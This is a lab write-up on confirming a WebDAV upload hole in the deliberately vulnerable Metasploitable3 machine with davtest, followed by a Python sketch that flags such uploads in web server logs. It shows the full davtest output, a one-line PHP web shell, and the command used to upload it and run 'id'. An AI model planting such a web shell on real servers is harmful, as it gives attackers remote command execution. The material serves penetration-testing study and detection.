Metasploitable3: File Upload Vulnerability


A vulnerability scan of Metasploitable3 with OpenVAS reported that the PUT and DELETE methods are enabled on the uploads folder, so I verify that finding here.
I use davtest for the verification.
Metasploitable3 IP address: 192.168.56.123

GIT CLONE

Clone the repository with the following command.

git clone https://github.com/cldrn/davtest.git

Verification

Run the following command in the davtest folder that was created.

perl davtest.pl -url http://192.168.56.123/uploads/

Result

********************************************************
 Testing DAV connection
OPEN		SUCCEED:		http://192.168.56.123/uploads
********************************************************
NOTE	Random string for this session: V0TtUsb1tJFU
********************************************************
 Creating directory
MKCOL		SUCCEED:		Created http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU
********************************************************
 Sending test files
PUT	php	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.php
PUT	cgi	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.cgi
PUT	html	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.html
PUT	shtml	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.shtml
PUT	jhtml	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.jhtml
PUT	txt	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.txt
PUT	cfm	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.cfm
PUT	jsp	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.jsp
PUT	asp	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.asp
PUT	pl	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.pl
PUT	aspx	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.aspx
********************************************************
 Checking for test file execution
EXEC	php	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.php
EXEC	php	FAIL
EXEC	cgi	FAIL
EXEC	html	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.html
EXEC	html	FAIL
EXEC	shtml	FAIL
EXEC	jhtml	FAIL
EXEC	txt	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.txt
EXEC	txt	FAIL
EXEC	cfm	FAIL
EXEC	jsp	FAIL
EXEC	asp	FAIL
EXEC	pl	FAIL
EXEC	aspx	FAIL

********************************************************
davtest.pl Summary:
Created: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.php
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.cgi
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.html
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.shtml
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.jhtml
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.txt
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.cfm
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.jsp
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.asp
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.pl
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.aspx
Executes: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.php
Executes: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.html
Executes: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.txt

PHP files can apparently be uploaded, so I try uploading a web shell.
Prepare the following file in the davtest folder.

webshell.php
<?php echo system($_GET['cmd']); ?>

Run the following command.

perl davtest.pl -url http://192.168.56.123/uploads/ -uploadfile ./webshell.php -uploadloc webshell.php

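Accessing http://192.168.56.123/uploads/webshell.php?cmd=id from a browser displays the result of the command. The line appears twice because system() prints the command's output itself and echo then prints its return value, which is the last line of that output.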

uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)
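
Seen from the server side, the session above leaves a clear trail in the web server's access log: successful WebDAV write methods under /uploads/, followed by requests for the files that were just uploaded. The following detection sketch is an added example, not part of the original article or of davtest; it assumes the Apache combined log format, and the function name `find_upload_abuse`, the client addresses and the timestamps are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed sample in Apache combined log format (assumed); the client
# addresses and timestamps are made up, the paths mirror the session above.
SAMPLE_LOG = """\
192.168.56.1 - - [04/May/2025:17:10:01 +0900] "MKCOL /uploads/DavTestDir_V0TtUsb1tJFU HTTP/1.1" 201 - "-" "-"
192.168.56.1 - - [04/May/2025:17:10:02 +0900] "PUT /uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.php HTTP/1.1" 201 - "-" "-"
192.168.56.1 - - [04/May/2025:17:10:02 +0900] "PUT /uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.txt HTTP/1.1" 201 - "-" "-"
192.168.56.1 - - [04/May/2025:17:10:03 +0900] "GET /uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.php HTTP/1.1" 200 26 "-" "-"
192.168.56.1 - - [04/May/2025:17:10:03 +0900] "GET /uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.txt HTTP/1.1" 200 19 "-" "-"
192.168.56.1 - - [04/May/2025:17:15:40 +0900] "PUT /uploads/webshell.php HTTP/1.1" 201 - "-" "-"
192.168.56.1 - - [04/May/2025:17:16:05 +0900] "GET /uploads/webshell.php?cmd=id HTTP/1.1" 200 108 "-" "-"
192.168.56.20 - - [04/May/2025:17:16:30 +0900] "GET /index.html HTTP/1.1" 200 512 "-" "-"
192.168.56.20 - - [04/May/2025:17:17:00 +0900] "PUT /index.php HTTP/1.1" 405 312 "-" "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
WRITE_METHODS = {"PUT", "MKCOL", "DELETE", "MOVE", "COPY", "PROPPATCH"}
SCRIPT_EXT = (".php", ".cgi", ".pl", ".jsp", ".asp", ".aspx", ".cfm", ".shtml")

def find_upload_abuse(log_text, watched_prefix="/uploads/"):
    """Return (kind, ip, method, path) findings in log order."""
    findings, uploaded = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        path = urlsplit(m["target"]).path  # drop the query string
        if not (m["status"].startswith("2") and path.startswith(watched_prefix)):
            continue  # rejected request, or outside the watched folder
        method = m["method"]
        if method in WRITE_METHODS:
            findings.append(("dav-write", m["ip"], method, path))
            if method == "PUT":
                uploaded.add(path)
            elif method == "DELETE":
                uploaded.discard(path)
        elif path in uploaded and path.lower().endswith(SCRIPT_EXT):
            # A file that arrived via PUT is now being requested as a script.
            findings.append(("uploaded-script-run", m["ip"], method, path))
    return findings

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(*finding, sep="\t")
```

On a folder that is not meant to accept uploads, any `dav-write` finding is already worth investigating; `uploaded-script-run` marks the point where an uploaded file was served back as a script.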